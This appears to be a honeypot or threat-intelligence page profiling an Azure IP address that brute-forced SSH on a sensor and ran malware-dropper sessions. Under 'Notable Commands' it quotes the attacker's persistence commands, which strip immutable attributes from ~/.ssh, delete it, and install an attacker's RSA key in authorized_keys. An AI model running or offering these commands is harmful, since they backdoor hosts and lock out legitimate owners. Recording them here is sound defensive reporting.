← Back to feed

134.149.104.137

Threat Confidence
54%
Location
🇮🇪 IE / Dublin
ASN
AS8075 · Microsoft Corporation
Cloud Provider
Microsoft Azure
Total Events
413
Top 10% by volume
Agent Count
1
First / Last Seen
2026-04-16 01:22 — 2026-04-16 02:03
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
Initial Access
Defense Evasion
Credential Access
Command and Control
External Corroboration
Not flagged by any external feeds
Campaigns
Not associated with any campaigns
Session Forensics
malware_dropper ×16 credential_probe ×25 opportunistic_bruter ×16
Sessions
57 (32 with login)
Avg Depth Score
0.51
Commands Executed
48
Files Downloaded
16
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Fingerprints
SSH-2.0-libssh_0.11.1
Evidence Timeline
Opportunistic Bruter 3d5edf3277ec w4m_seattle_01 · 2026-04-16 02:03
1 50%
Loading events...
Malware Dropper 780664d4448d w4m_seattle_01 · 2026-04-16 02:03
3 1 1 100%
Loading events...
Credential Probe 60279fcba4f8 w4m_seattle_01 · 2026-04-16 02:03
1 20%
Loading events...
Credential Probe 091afb0550e9 w4m_seattle_01 · 2026-04-16 02:01
1 20%
Loading events...
Malware Dropper 119f11a33c96 w4m_seattle_01 · 2026-04-16 01:59
3 1 1 100%
Loading events...
Opportunistic Bruter 97e5c9f2c380 w4m_seattle_01 · 2026-04-16 01:59
1 50%
Loading events...
Credential Probe 141e00729d2f w4m_seattle_01 · 2026-04-16 01:59
1 20%
Loading events...
Credential Probe e5c1b7c68f27 w4m_seattle_01 · 2026-04-16 01:57
1 20%
Loading events...
Opportunistic Bruter c6915e14ea2f w4m_seattle_01 · 2026-04-16 01:56
1 50%
Loading events...
Malware Dropper c95a829d379f w4m_seattle_01 · 2026-04-16 01:56
3 1 1 100%
Loading events...
Credential Probe ead84549330e w4m_seattle_01 · 2026-04-16 01:56
1 20%
Loading events...
Opportunistic Bruter 1a8aab10602b w4m_seattle_01 · 2026-04-16 01:54
1 50%
Loading events...
Malware Dropper 149126fb1483 w4m_seattle_01 · 2026-04-16 01:54
3 1 1 100%
Loading events...
Credential Probe b6f473894e39 w4m_seattle_01 · 2026-04-16 01:54
1 20%
Loading events...
Malware Dropper 67a73c59318c w4m_seattle_01 · 2026-04-16 01:53
3 1 1 100%
Loading events...
Opportunistic Bruter ef981da259e2 w4m_seattle_01 · 2026-04-16 01:53
1 50%
Loading events...
Credential Probe ea1a048913a3 w4m_seattle_01 · 2026-04-16 01:53
1 20%
Loading events...
Malware Dropper ed1daf2573ae w4m_seattle_01 · 2026-04-16 01:51
3 1 1 100%
Loading events...
Opportunistic Bruter 30f80815de36 w4m_seattle_01 · 2026-04-16 01:51
1 50%
Loading events...
Credential Probe a5f9c062d043 w4m_seattle_01 · 2026-04-16 01:51
1 20%
Loading events...
Credential Probe 97a401882204 w4m_seattle_01 · 2026-04-16 01:49
1 20%
Loading events...
Credential Probe d1375bf75409 w4m_seattle_01 · 2026-04-16 01:48
1 20%
Loading events...
Opportunistic Bruter 97adf4efcd83 w4m_seattle_01 · 2026-04-16 01:46
1 50%
Loading events...
Malware Dropper a2c49aaeda25 w4m_seattle_01 · 2026-04-16 01:46
3 1 1 100%
Loading events...
Credential Probe 97d900ca031a w4m_seattle_01 · 2026-04-16 01:46
1 20%
Loading events...
Opportunistic Bruter 42c973e60471 w4m_seattle_01 · 2026-04-16 01:44
1 50%
Loading events...
Malware Dropper fb414d1c1ea0 w4m_seattle_01 · 2026-04-16 01:44
3 1 1 100%
Loading events...
Credential Probe aebf8c5e71ea w4m_seattle_01 · 2026-04-16 01:44
1 20%
Loading events...
Credential Probe 8523d7579998 w4m_seattle_01 · 2026-04-16 01:43
1 20%
Loading events...
Opportunistic Bruter 23f9b05f9e32 w4m_seattle_01 · 2026-04-16 01:41
1 50%
Loading events...
Malware Dropper a7aa40ca3737 w4m_seattle_01 · 2026-04-16 01:41
3 1 1 100%
Loading events...
Credential Probe a920e63b7381 w4m_seattle_01 · 2026-04-16 01:41
1 20%
Loading events...
Opportunistic Bruter 1e27c73ee05e w4m_seattle_01 · 2026-04-16 01:39
1 50%
Loading events...
Malware Dropper 59569f448821 w4m_seattle_01 · 2026-04-16 01:39
3 1 1 100%
Loading events...
Credential Probe 64ae4db0df26 w4m_seattle_01 · 2026-04-16 01:39
1 20%
Loading events...
Opportunistic Bruter 8fb24699cc11 w4m_seattle_01 · 2026-04-16 01:38
1 50%
Loading events...
Malware Dropper 2621e6e1db06 w4m_seattle_01 · 2026-04-16 01:38
3 1 1 100%
Loading events...
Credential Probe 8a74a4db3de7 w4m_seattle_01 · 2026-04-16 01:38
1 20%
Loading events...
Opportunistic Bruter 34e401ebae7f w4m_seattle_01 · 2026-04-16 01:36
1 50%
Loading events...
Malware Dropper 20791da9a6f6 w4m_seattle_01 · 2026-04-16 01:36
3 1 1 100%
Loading events...
Credential Probe d824ec756658 w4m_seattle_01 · 2026-04-16 01:36
1 20%
Loading events...
Credential Probe 42740144cc93 w4m_seattle_01 · 2026-04-16 01:34
1 20%
Loading events...
Malware Dropper caa97b6c436a w4m_seattle_01 · 2026-04-16 01:32
3 1 1 100%
Loading events...
Opportunistic Bruter 10b4e7cadfc0 w4m_seattle_01 · 2026-04-16 01:33
1 50%
Loading events...
Credential Probe 8d1d09357f92 w4m_seattle_01 · 2026-04-16 01:33
1 20%
Loading events...
Credential Probe ecbdc72d5d6e w4m_seattle_01 · 2026-04-16 01:31
1 20%
Loading events...
Malware Dropper 46564e74d0ad w4m_seattle_01 · 2026-04-16 01:29
3 1 1 100%
Loading events...
Opportunistic Bruter d6abb971d690 w4m_seattle_01 · 2026-04-16 01:29
1 50%
Loading events...
Credential Probe 6f886c52e7ff w4m_seattle_01 · 2026-04-16 01:29
1 20%
Loading events...
Malware Dropper 4e29f8c033ce w4m_seattle_01 · 2026-04-16 01:28
3 1 1 100%
Loading events...